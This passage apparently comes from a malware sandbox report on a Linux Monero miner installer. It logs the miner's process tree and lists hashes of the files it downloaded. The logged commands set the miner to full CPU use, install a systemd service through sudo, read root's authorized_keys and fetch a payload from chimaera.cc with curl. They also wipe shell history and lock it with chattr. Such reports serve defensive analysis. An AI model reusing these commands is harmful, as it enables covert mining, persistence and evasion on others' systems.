".column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring" "div{height:1.875rem;width:1.875rem}.lds-ring" "div{animation:lds-ring" 1.2s "cubic-bezier(.5,0,.5,1)" "infinite;border:.3rem" solid "transparent;border-radius:50%;border-top-color:#313131;box-sizing:border-box;display:block;position:absolute}.lds-ring" "div:first-child{animation-delay:-.45s}.lds-ring" "div:nth-child(2){animation-delay:-.3s}.lds-ring" "div:nth-child(3){animation-delay:-.15s}@keyframes" "lds-ring{0%{transform:rotate(0)}to{transform:rotate(1turn)}}@media" screen and "(-ms-high-contrast:active),screen" and "(-ms-high-contrast:none){.main-wrapper,body{display:block}}</style><meta" "http-equiv=\"refresh\"" "content=\"375\"></head><body" "class=\"no-js\"><div" "class=\"main-wrapper\"" "role=\"main\"><div" "class=\"main-content\"><noscript><div" "id=\"challenge-error-title\"><div" "class=\"h2\"><span" "id=\"challenge-error-text\">Enable" JavaScript and cookies to "continue</span></div></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId:" "'3',cZone:" "\"chimaera.cc\",cType:" "'managed',cNounce:" "'26652',cRay:" "'8722f6cc78d89491',cHash:" "'ed8deb8e2ce57dc',cUPMDTk:" "\"\\/data\\/xmrig\\/wallet.rotate.suckers.txt?__cf_chl_tk=k38ILQ0z6q6yaYLzJs0AJdeQAB5nAQTVRCHaI6K9FVE-1712754490-0.0.1.1-1599\",cFPWv:" "'b',cTTimeMs:" "'1000',cMTimeMs:" "'375000',cTplV:" "5,cTplB:" "'cf',cK:" "\"visitor-time\",fa:" "\"\\/data\\/xmrig\\/wallet.rotate.suckers.txt?__cf_chl_f_tk=k38ILQ0z6q6yaYLzJs0AJdeQAB5nAQTVRCHaI6K9FVE-1712754490-0.0.1.1-1599\",md:" "\"S3Dr0L_ebZi0aSsICpbe1T0.vyF5TJHwvn3argzKcJg-1712754490-1.1.1.1-R9mDWaClCPyb4yt0.oWdYCKrPRWt9SBIk27rwQt9qs2DArCITV.IWNaCPuOgvBb4ye5.bsrbZWS70l9jzhwQ0oWwgByGWi6I7TTq_7J6E7..ZOD4jqGF85gWVyKQX.T_i5AghMdhQDQKEqBQXD0BPjRoL9VJlJFwKWnyxd.R7.g71hhMMx6qKsj.1870FneiLPlg0F0kWROji8UOoE1Swx.WcFPF0kQXMzFvFdBLrHjBKlnZNmmrHxCygpHCckhwohJvUlJuCXpUW7vICEQJyafeBY0AaA8JW9zaoXgzatg3U4dZO3p91r2TJ8pZQm8n2KrIQvgOg7UVSqbS70rOxL_E14gjHUoHMa14HGQs2dhOspIHcWLi4ziwJ0rSIrc8987xpRgPFaTa8kUzH7SQcZzNVEUhf2CTqEjBbheU3XArhdBv55m9qwJ_bzFTGoi7SmwRH9fGbXMIR7ARrXYGS9TJU7S9KKc6kbKGHnxh8Nf7xjZzIOwEwExpkYzXYxdV1RCJJfdXB1LocWCzR..CHlOeElkiMYErYOhlJgagS2nHpW7mdw2hOeVN.iOJq977QFEl8QLZCEd.TklCJYIf78_s0pfdhXwrUDK6SfHM7fgMot__abK_1rvT..49GG7OYw0wLqWcyHiIMEHnUVDBIUR50voHwM3br9Xyi__Zws0kZZuPAWxO.TMuA500iO2ZB_f1._aM8uz7NfW2Q2KwPJ8QVq_o4eXW_.3BgVHq_CX3eop_pUKUDVoEggSLZHeVXAOyU_MVDVx6_nAbNa_642PmjnEI3EL.aq32JPQ0Uenz16XsZhCeqEyfpBKc6QOFBnG9McreBNp4yMD9c4IdHx2XhoYIpWD2qIOk7fU0hHheLLVAYC6tsKEDdTlzaBuCoBouxKsXXLTfgTU2C2cU3gplXWVXDYz_8EUyy7pFtAMO0oTXVhQjN3wJMjNBETiex4noOqScDRf42GLmp1ILW82UWZlI2xdUdNtNZ3705hxjeJhSIlslmOr1J0iojTT2IuFPDm64CPmGSD15m5NxY09AUfOi26OYnMO8LEeRCLbhjrqr0lRzT8BxdQxJ2BQH2ez8U87uj7dQPmm0AuklXClKR2N8Yx.q685h_Wa36qnbVsiNpt7XpMkGbHyJYzgh.qTNeWCcPll6apSfZKmYeRN.IYCtJDOiPepitW9v97vyMO3CyBtvGf1FOufN25gtO.2NdEe0JYhi_1NrbcXPGWVKbl3bX4FB1cLpFvl4QXxDxd9QYWhEdCfU_0VYE7aEIVHpuIwaxp12AcKlpiWbwkX7OIuHidl6cgSqVDtpRJZHFx1kKDajq8ilGDo852wq2Mvnd59G79PT6vX2aBKg3aglrltLSq5DkjfgXRvWV0fqvPDEDtTTSHUBXkPNN4xdJhaWgAcf9xdOxUv1yUbaNgIp0drQW75YXE49gG0kvmg_dvQFf..Rn.qgm19e8jtSo9ahTu3VGV4TPJQ1YpqZRAnJpnBpkIf1lwWCwgmYke2np2BLnk_h05603e8h3Qje\",mdrd:" "\"tiNCykVmUlx6BNyrTzqPyC2HtGoXrYt4E3qQu4k_muY-1712754490-1.1.1.1-jW.Q0fKQDHf8ZuJaSNN1EdD3HPQp3Ho8XXfjJwGGWHng2P_m2s4gyKMYs08jV6DTcA_25HjJwQFJi7MrYWYIQR1s8pBXy2kkPMgfwNZk22OPrcMdh9f4U33hw0ZLCAw3S_hkx5qD1TflYroeH8tkVvXbP_SmyhwmtbuHVUDOreLGlUVcrEI2r4fXVThfSYAVkXZcdGuMwo8HghhWsuEkwl1wjEQR_DQY2RCP1buYhpNJx.C.je6VuVFntPqnNS.kqXdmmbCmfa_OjTorC97QcoMsbdNkGsjsB5Q.s4T51O0cThrmVH_Eal0sDT4PJhRyPSr0gJgyb5vJepeXEYFg4xwvVPLvO8z8FFO19qVaPQapPDNi8gQXV3UMdNgNxnlAtHq7qUlVZzQBjqQDoJxvb1c1Pf1SQacHpCMBLBHam7p5Q9veY6cxEOriQdkLjqXkkFwHzTZ.1gJZhxtxsJ5cDkFgCMZnpZ9tPITyJfNXCE5buynSR5XaDRGlJ0eHo_gqSmKHhBzIMGaopUY9he8VHg\",cRq:" "{ru:" "'aHR0cDovL2NoaW1hZXJhLmNjL2RhdGEveG1yaWcvd2FsbGV0LnJvdGF0ZS5zdWNrZXJzLnR4dA==',ra:" "'Y3VybC83LjU4LjA=',rm:" "'R0VU',d:" "'thlRAiLGHH/KeJDG9eDCHUzkCNcPc6m3yPVNwci3V7D4vG9okXwY6JlzsNXUjubNy6m7gkhhRoQmTw2S7VUwoT0kAFs7j1cPoeNg/mB2K0VRAXTCIj7LlkskA+jIqynxfk8eLTACvbVj3rKS+KlYWEehXmNdOaqUiK/6Rr7Sts2zc1wJyua7ENOYsUzrc/6+fVmMNL5M8+qMnFmzOYsbCYjDI+k/05SSrksjKtMv680N83ks80iCyWn6giQ2EFHqKnxZn/KI2qPH/ABXQPqpb8jvKL5ZO4pk8ZFug6co6nXhgmfzJeDh27jty6u5C59Wu3dcsoXO+lT9r/bmIdZLBPGuNHd2pzBbuRm3UUU94ZObWNySwprSEsbCP1fFrrVEkomZhiEkN1BsMF6Mbgmv/841FLesf6qElmtuog1qu+9KpkOHd6ABhF5DKUZCq0l2AnH3VTPsWH6ygE7e0NJ66uqF7H4kxJRUmk6//7UM5tHPJabLJokr2teDC5GZ9rffl5M7ccLeChX0df9ase+R3+9rGptCMEjdUCwCjTRA19Y=',t:" "'MTcxMjc1NDQ5MC4zMjUwMDA=',cT:" "Math.floor(Date.now()" / "1000),m:" "'VpgChHdv/V/IRtaWAyWuH1eA7SUEQHnts4fvykLiDjQ=',i1:" "'S/IxqJxjZ0XtKbgVgCOHow==',i2:" "'IWNZzus4DcY/jsQb4w+bjQ==',zh:" "'BE3yDcBJfISHS68G5yvzzMRy5hSN+SzSUcAzErYYXY4=',uh:" "'3eCW9wmHFxRdeO8XVCuzIxmX/hZFk4VAcqHhoWaSI4Q=',hh:" "'Tg7bwaAfwqyBlelbU/iswxId9ucV5mZDRctkcf04SJ0=',}};var" cpo "=" "document.createElement('script');cpo.src" "=" "'/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8722f6cc78d89491';window._cf_chl_opt.cOgUHash" "=" location.hash "===" "''" "&&" "location.href.indexOf('#')" "!==" -1 "?" "'#'" : "location.hash;window._cf_chl_opt.cOgUQuery" "=" location.search "===" "''" "&&" "location.href.slice(0," location.href.length - "window._cf_chl_opt.cOgUHash.length).indexOf('?')" "!==" -1 "?" "'?'" : "location.search;if" "(window.history" "&&" "window.history.replaceState)" "{var" ogU "=" location.pathname + window._cf_chl_opt.cOgUQuery + "window._cf_chl_opt.cOgUHash;history.replaceState(null," "null," "\"\\/data\\/xmrig\\/wallet.rotate.suckers.txt?__cf_chl_rt_tk=k38ILQ0z6q6yaYLzJs0AJdeQAB5nAQTVRCHaI6K9FVE-1712754490-0.0.1.1-1599\"" + "window._cf_chl_opt.cOgUHash);cpo.onload" "=" "function()" "{history.replaceState(null," "null," "ogU);}}document.getElementsByTagName('head')[0].appendChild(cpo);}());</script></body></html>\",/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
PID:1649
-
-
/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu1804-amd64-20240226-en-9\",/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
PID:1650
-
-
/bin/sedsed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
PID:1651
-
-
/bin/sedsed -i "s#\"log-file\": *null,#\"log-file\": \"/usr/sbin/moneroocean/xmrig.log\",#" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
PID:1652
-
-
/bin/sedsed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
- Reads runtime system information
PID:1653
-
-
/bin/cpcp /usr/sbin/moneroocean/config.json /usr/sbin/moneroocean/config_background.json2⤵
- Write file to user bin folder
PID:1654
-
-
/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /usr/sbin/moneroocean/config_background.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
PID:1655
-
-
/bin/catcat2⤵PID:1656
-
-
/bin/chmodchmod +x /usr/sbin/moneroocean/miner.sh2⤵PID:1657
-
-
/usr/bin/sudosudo -n true2⤵PID:1658
-
/bin/truetrue3⤵PID:1659
-
-
-
/bin/catcat2⤵PID:1663
-
-
/usr/bin/sudosudo mv /tmp/moneroocean_miner.service /etc/systemd/system/moneroocean_miner.service2⤵PID:1664
-
/bin/mvmv /tmp/moneroocean_miner.service /etc/systemd/system/moneroocean_miner.service3⤵PID:1665
-
-
-
/usr/bin/sudosudo killall xmrig2⤵PID:1666
-
/usr/bin/killallkillall xmrig3⤵
- Reads runtime system information
PID:1667
-
-
-
/usr/bin/sudosudo systemctl daemon-reload2⤵PID:1668
-
/bin/systemctlsystemctl daemon-reload3⤵PID:1669
-
-
-
/usr/bin/sudosudo systemctl enable moneroocean_miner.service2⤵PID:1690
-
/bin/systemctlsystemctl enable moneroocean_miner.service3⤵PID:1691
-
-
-
/usr/bin/sudosudo systemctl start moneroocean_miner.service2⤵PID:1712
-
/bin/systemctlsystemctl start moneroocean_miner.service3⤵
- Reads runtime system information
PID:1713
-
-
-
/bin/mkdirmkdir -p /root/.ssh/2⤵PID:1715
-
-
/bin/catcat /root/.ssh/authorized_keys2⤵PID:1716
-
-
/usr/bin/curlcurl -Lk http://chimaera.cc/so/xmrig.so -o /etc/lib.so2⤵PID:1717
-
-
/bin/rmrm -fr /usr/sbin/.bash_history2⤵PID:1724
-
-
/usr/bin/touchtouch /usr/sbin/.bash_history2⤵
- Write file to user bin folder
PID:1725
-
-
/usr/bin/chattrchattr +i /usr/sbin/.bash_history2⤵
- Attempts to change immutable files
PID:1726
-
-
/bin/sleepsleep 32⤵PID:1727
-
-
/usr/bin/clearclear2⤵PID:1728
-
-
/usr/bin/awkawk "{print \$5}"1⤵PID:1590
-
/bin/lsls -al /.dockerenv1⤵PID:1589
-
/usr/bin/bcbc -l1⤵PID:1601
-
/usr/bin/cutcut -f1 -d.1⤵PID:1646
-
/bin/hostnamehostname1⤵PID:1645
-
/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"1⤵PID:1647
-
/usr/bin/awkawk "{print \$2}"1⤵PID:1662
-
/bin/grepgrep MemTotal /proc/meminfo1⤵PID:1661
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD53efd3edec3cb5529056399914e6f0bc6
SHA181d9d3bc15f0c7d22490b51d0fa8a794ca928a57
SHA256e3fbebceabcedef16272ff5f57c98760010635aca8c390903df349e927e7c463
SHA512c44d4fdee1a9db3b27434f74ec15836853da9ce91bbb22b675943b9881718f84078dfed7399eb49add8bb02ddcec75301db8283a8ce98fad80cd7c4862979727
-
Filesize
740B
MD547bed26aa0e018ae03a34d15a236aadb
SHA1bebceff9be1e23b9076fd442910f54f3ac4b7677
SHA25669d88dcf5adc9acc16bc6086880f34543ac3c0bfafb12675c556e0c3e500be7a
SHA512bb5d96dd8c75fd2717f1e048eaf0dfe762a99cc53fc017201cd4c148618a46db54529e476cda2c22e9a060b5d3dd516764da8fdca63246af696d4ac245e14fb8
-
Filesize
199B
MD567042bf60d0f1692044a7b847d0191b3
SHA1eb3075ba01c25305061c4308cfdb4192883cadd9
SHA25637064d2bbc71b318cd264e74180112b57d69f4f602dcf1fd6ec026c15a0ea2ea
SHA512dd242735d56b354ea94bd8b78433dc77d808eb55edf29d8169cb69711a0e0ab9e7d4237746a35f91939f6076d6a660ebece6fae99273bcf74271cafc59ad7654
-
Filesize
284B
MD55023ab04e7ad1953b085ed0dae998c13
SHA13629a397a589aa85813ae1b538073b7d39a9ba91
SHA256c2de756d29cdafac2646cda713f52fbb0e5faf8beebc0d49a6b0a43db4b2a448
SHA512aa1504c10a47dd8f8a4d02f367b3c8a50e1b7c9609cf07e8e83a2991fa22d516c700e7b6b7d992951cfafb4999648a404482724e2384f08a96800e1105ae27c5
-
Filesize
150B
MD51112729fd73ff062c1e14fd8e9020814
SHA1aec9b46501f31325864df398245908f375e488a1
SHA256db937fd53bf47bcb1a3dc46fe1cde31a885468f692c8ab1b9c1b057cf9d89c48
SHA512a2bbb340080977bd5e3a3a1f39564df695499dd52d29b0b5f62a9c419449a053fec24ead234ee5927e594d70135e80791dbd247ed582926cca4467af1966fd49
-
Filesize
2KB
MD561def7b3b98458a40fffa42a19ddf258
SHA11b18a16b8e2950332b8f47f4af6de254fa2313aa
SHA2562c923d8b553bde8ce3167fe83f35a40a712e2bed2b76ebaf5e3e63642d551389
SHA512e2258bb277ff72fc4033979190aa55f87a8fdf8ae2e689456798e2789ce3f3a267d4ea5a4c6d27e8460c553ca7d34a319b79f87bf651d262aec6685aa155d1fc
-
Filesize
2KB
MD597a9f59c34de8c4e26959e011358a9e1
SHA128fbf5bed126c9f33dc15059bc02c3cac97f5815
SHA256e6d3e8a2c7e4ef7989e5839b8a43d263aec89ee74d4c19e26a0bac0256cec249
SHA512cf306d8e180b81c0363c71104d12148a0fb6c0a1a5cfd74ac2d479d3c68a39e9f9c34f913831ac0881a4fef2885436a0fdcf4acb39111d9970bd8e26d21a37d3
-
Filesize
2KB
MD539d7247898ce23af2bc3a89dd3708633
SHA1a7795d9be2314b27f187d0e199aa7c91512f75a0
SHA25665df7610caa3d420b033e8ff3d85d83fdf92d0a18cd35147f513af5058adadb7
SHA51213ea922e9630cf9f8658f8836e190b64598c0560e200b1df66660804bf75860a171fb5bd112454abb5195c1d3dcca9efa2f6557fba66daacf5fb1b0930bf28a7
-
Filesize
2KB
MD5135987d5346ec86759a116a72d066c97
SHA1c6b23c675f3f78292431aa12b9295b373b726e99
SHA2569e715ebff9497af5dbc1e6703878e425f8623ac47dfe87437cbc19ed36329fa2
SHA5128593d79febd1b46d11ffb92e14e4654f4d03635b1260317d8eeacfa26dc23364aae906aa584cee952aba158c9aa800d754e8f86942387c13dd608ebe577276fb
-
Filesize
2KB
MD5b4a1290ce9e37d68f4d6aace3f531249
SHA17980bedf7bf89c010e8f6c9ffd13f67240f731d3
SHA256cec054f41315b1b82da228bc6f00d20be7db36b726898378db7620baa3e09442
SHA512fce6b701fbfbeb6199ddc2e31724c7fdf5c947b6729bc1422f2eb5f8cc2e17c8f63159dca17c11aa1480ee6ca8b68508091540c5e08ffcf3bcbae970921c27f8
-
Filesize
2KB
MD561d0d000cefe2eafef865eb5d8f80e48
SHA1ca7dfe310e08ccf05efc425fdeb1d342c7447b90
SHA2562071cc6d2049ed9f12bcd8e901ccb3b564fc63bbfe70943d14a6467452755b2d
SHA512a747d6f98cff630e1b322c4a547876d769e3aad9cebe88ff10e56a386e4b76fc22799ae7b29dc9131af2609dccb522ae66f90f8bb3ce0e2b15cfc61c9eca4c49
-
Filesize
2KB
MD574421a02c2e29832947bf77ccf693a0d
SHA18c4e194f5069285685a3e685d8befc507e0d0057
SHA2561e57db97331f81c60fc3156102add356ad73065453f4cccc0d34bd787f35322f
SHA5127c9fd7fdbd2fe332dc845f2b71e40992e059c10709d6b562bfb367d280c82336f5c1f7ceda6cc095ad1ea71982121f48c2cae84530d992b5b0307a3a6e830399
-
Filesize
6.0MB
MD59265036fba2393351f88b1aa3fa37969
SHA1ac558b2e2aa5cc9da4134a3430a4626a2b34a7df
SHA256ef11c120fab2129fce6dddb8b007102ef98281e11864386ff09c179c58d1dfe0
SHA51219de0dd54406fd9d1f97f1e8c83c97852768ce2b29f1addf6098ee43db10e0960085ed4ab19a38d4de271e1900436dc9d70be26b23d4beb4d09b27275a8a9c95
-
Filesize
443B
MD512365ca29a2238d02cc4145682ca6a72
SHA1d8f2ed34c85d1ecfa0181ca9106442492aecd558
SHA256fb093f22694408724d99751b80165031f0c696cdd7753644d77cc32066ce86cc
SHA512db0cb00d9fa7a27467151fd2af3281efd2b42dd63bc6b0317702fdacab0069667044486ad7dd38279ad228692b3635778864d7886b0a6a73706a57326f2555f5
-
Filesize
2.4MB
MD5cf928f3590039dc1558cb7b8573d02d2
SHA1fb69049e1112929ae7e9745eb1bcfadfaeaf553b
SHA256be225e89211a3667e758a133bf75270daf1bb000672b5b4ba7b6337166e1c6f7
SHA512a6fb723d64f00280a7b81d54687610de374c877bffe82e6ef93a034f30440841b04800714802029c4e9832282f8e6f27dacae3f32f2b676afcc106caf33c29ce